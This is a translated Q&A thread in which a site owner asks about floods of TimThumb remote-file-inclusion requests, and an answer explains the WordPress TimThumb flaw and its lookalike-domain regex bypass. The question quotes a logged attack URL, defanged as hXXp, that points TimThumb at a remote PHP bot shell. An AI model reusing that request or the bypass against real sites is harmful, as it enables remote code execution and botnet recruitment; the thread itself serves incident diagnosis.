2

我的服务器 (mediaquarter.at) 目前正被这样的请求 DDoSed(有一些小的变化):hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/ timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php(网址“已停用”,因此不会有人意外点击它)

如果您尝试下载引用的 PHP 文件,请注意:在 preg_replace 中激活了 /e 开关,并且代码包含多个 eval 语句 - 在您想查看之前清理它!看起来像 pBot,你可以在这里找到更多信息:http ://www.offensivecomputing.net/?q=node/1417

TimThumb 容易受到远程文件包含的影响 (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - 似乎在WordPress。所以我会理解有人调用 hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php 来利用漏洞。

但是,尝试通过另一个网站 (mediaquarter.at) 调用它有什么意义,只会导致 404 错误消息?此外,我的服务器没有运行 WordPress,而是使用 SilverStripe,所以这似乎毫无意义。

这只是攻击者一方的错误/愚蠢,还是我在这里忽略了某种攻击媒介?

PS:服务器只是一些廉价的虚拟主机,我根本无法访问它,所以我无法验证系统是否有任何变化。

4

1 回答 1

2

如果您没有 timthumb.php 文件,那么您就不会简单易受攻击。这是一个非常奇特的漏洞,我已经深入研究过,因为(到目前为止)它是独一无二的。您应该阅读从攻击者的角度 编写的漏洞利用程序。

简而言之,它缓存来自 youtube.com 和 blogger.com 等“可信”网站的图像。然而,这个正则表达式写得不好,并且没有绑定到字符串的末尾。更改您的子域以欺骗此正则表达式检查是微不足道的。这就是为什么攻击者的域名是blogger.com.midislandrental.com.

您受到 DDoS 攻击的原因可能是因为 timthumb.php 的获取没有返回 404,或者通过 timthumb.php 传播的大型僵尸网络错误地将您识别为易受攻击。您可能会出现在 google dork 中,让机器人试图找到易受攻击的主机。

于 2011-12-14T02:37:43.680 回答